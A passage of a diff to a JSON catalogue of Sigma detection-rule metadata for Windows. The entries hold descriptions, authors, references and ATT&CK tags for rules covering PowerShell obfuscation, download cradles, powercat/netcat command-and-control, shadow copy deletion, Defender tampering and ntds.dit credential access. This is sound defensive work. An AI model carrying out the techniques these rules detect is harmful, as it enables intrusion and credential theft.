"https://twitter.com/oulusoyum/status/1191329746069655553", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ] + }, + "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "value": "Time Travel Debugging Utility Usage - Image" + }, + { + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/02", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "value": "Microsoft Defender Loading DLL from Nondefault Path" + }, + { + "description": "Detects suspicious encoded payloads in WMI Event Consumers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_wmi_susp_encoded_scripts.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", + "value": "Suspicious Encoded Scripts in a WMI Consumer" + }, + { + "description": "Detects creation of WMI event subscription persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "filename": "sysmon_wmi_event_subscription.yml", + "level": "medium", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "value": "WMI Event Subscription" + }, + { + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro", + "creation_date": "2019/04/15", + "falsepositive": [ + "Legitimate administrative scripts" + ], + "filename": "sysmon_wmi_susp_scripting.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "value": "Suspicious Scripting in a WMI Consumer" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_powercat.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/besimorhino/powercat", + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", + "value": "Netcat The Powershell Version" + }, + { + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_wsman_com_provider_no_powershell.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" + "https://github.com/bohops/WSMan-WinRM", + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "value": "Suspicious Non PowerShell WSMAN COM Provider" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "value": "Use Get-NetTCPConnection" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pc_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "value": "Remote PowerShell Session (PS Classic)" + }, + { + "description": "Detects PowerShell called from an executable by the version mismatch method", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_exe_calling_ps.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "value": "PowerShell Called from an Executable Version Mismatch" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": "posh_pc_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", + "value": "Alternate PowerShell Hosts" + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "meta": { + "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", + "creation_date": "2017/03/22", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_downgrade_attack.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6331d09b-4785-4c13-980f-f96661356249", + "value": "PowerShell Downgrade Attack - PowerShell" + }, + { + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "meta": { + "author": "frack113", + "creation_date": "2021/06/03", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + ], + "filename": "posh_pc_delete_volume_shadow_copies.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "value": "Delete Volume Shadow Copies Via WMI With PowerShell" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_xor_commandline.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_pc_susp_download.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "value": "Suspicious PowerShell Download" + }, + { + "description": "Detects renamed powershell", + "meta": { + "author": "Harish Segar, frack113", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_renamed_powershell.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "value": "Renamed Powershell Under Powershell Channel" + }, + { + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "meta": { + "author": "frack113", + "creation_date": "2021/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_tamper_with_windows_defender.yml", + "level": "high", + "logsource.category": "ps_classic_provider_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "value": "Tamper Windows Defender - PSClassic" + }, + { + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "meta": { + "author": "Sai Prashanth Pulisetti @pulisettis", + "creation_date": "2022/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "value": "Nslookup PowerShell Download Cradle" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": "posh_pm_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", + "value": "Alternate PowerShell Hosts - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" + }, + { + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "meta": { + "author": "ok @securonix invrep_de, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + ], + "filename": "posh_pm_bad_opsec_artifacts.yml", + "level": "critical", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://www.mdeditor.tw/pl/pgRt", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "value": "Bad Opsec Powershell Code Artifacts" + }, + { + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_clipboard.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "value": "PowerShell Get Clipboard" + }, + { + "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_decompress_commands.yml", + "level": "informational", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/8", + "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "value": "PowerShell Decompress Commands" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", + "value": "Suspicious Get Local Groups Information" + }, + { + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_addbaccount.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", + "value": "Suspicious Get-ADDBAccount Usage" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_powercat.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/besimorhino/powercat", + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", + "value": "Netcat The Powershell Version - PowerShell Module" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_pm_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", + "value": "Clear PowerShell History - PowerShell Module" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "2f211361-7dce-442d-b78a-c04039677378", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pm_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "value": "Remote PowerShell Session (PS Module)" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "6942bd25-5970-40ab-af49-944247103358", + "value": "Suspicious Get Information for SMB Share - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" + }, + { + "description": "Detects 